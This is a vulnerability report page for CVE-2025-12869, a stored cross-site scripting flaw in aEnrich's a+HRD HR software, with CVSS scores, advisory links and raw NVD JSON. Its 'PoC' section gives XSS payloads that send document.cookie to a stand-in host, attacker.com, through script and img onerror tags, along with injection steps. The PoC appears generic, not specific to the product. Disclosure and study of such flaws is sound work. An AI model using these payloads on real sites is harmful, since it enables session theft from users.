Security Vulnerability Report
CVE-2025-12869 CVSS 4.8 MEDIUM

Published: 2025-11-12 08:15:41
Last Modified: 2025-11-18 19:30:29

Description

a+HRD, developed by aEnrich, has a Stored Cross-Site Scripting vulnerability, allowing remote attackers with administrator privileges to inject persistent JavaScript code that is executed in users' browsers upon page load.

CVSS Details

CVSS Score: 4.8
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:aenrich:a\+hrd:*:*:*:*:*:*:*:* - VULNERABLE
a+HRD (aEnrich) - version unknown

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// CVE-2025-12869 Stored XSS PoC for a+HRD
// This PoC demonstrates the stored XSS vulnerability in a+HRD
// Note: This is for educational and authorized testing purposes only

// Malicious payload that could be injected via administrator panel
const xssPayload = '<script>\n' +
  ' // Steal session cookies\n' +
  ' fetch("https://attacker.com/steal?cookie=" + encodeURIComponent(document.cookie));\n' +
  ' // Alternative payload using img tag for bypass\n' +
  '</script>\n' +
  '<img src=x onerror="fetch(\'https://attacker.com/steal?data=\'+document.cookie)">\n' +
  '<svg onload="alert(document.domain)">';

// Example attack scenario:
// 1. Attacker with admin privileges accesses a+HRD admin panel
// 2. Navigates to a field vulnerable to XSS (e.g., employee name, department, job title)
// 3. Submits the XSS payload instead of legitimate data
// 4. Payload is stored in database without sanitization
// 5. When other users view the affected page, the script executes in their browser

console.log('PoC Payload:', xssPayload);
console.log('Target: a+HRD by aEnrich');
console.log('Vulnerability: Stored XSS');
console.log('CVSS: 4.8 (Medium)');

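References

https://www.twcert.org.tw/en/cp-139-10487-12a32-2.html (Third Party Advisory)
https://www.twcert.org.tw/tw/cp-132-10486-a3459-1.html (Third Party Advisory)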

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12869", "sourceIdentifier": "[email protected]", "published": "2025-11-12T08:15:41.290", "lastModified": "2025-11-18T19:30:29.273", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The a+HRD developed by aEnrich has a Stored Cross-Site Scripting vulnerability, allowing remote attackers with administrator privileges to inject persistent JavaScript codes that are executed in users' browsers upon page load."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", 
"providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.7, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:aenrich:a\\+hrd:*:*:*:*:*:*:*:*", "versionEndIncluding": "7.5", "matchCriteriaId": "AFE95A54-8084-4126-A1B7-9B89828066C0"}]}]}], "references": [{"url": "https://www.twcert.org.tw/en/cp-139-10487-12a32-2.html", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.twcert.org.tw/tw/cp-132-10486-a3459-1.html", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}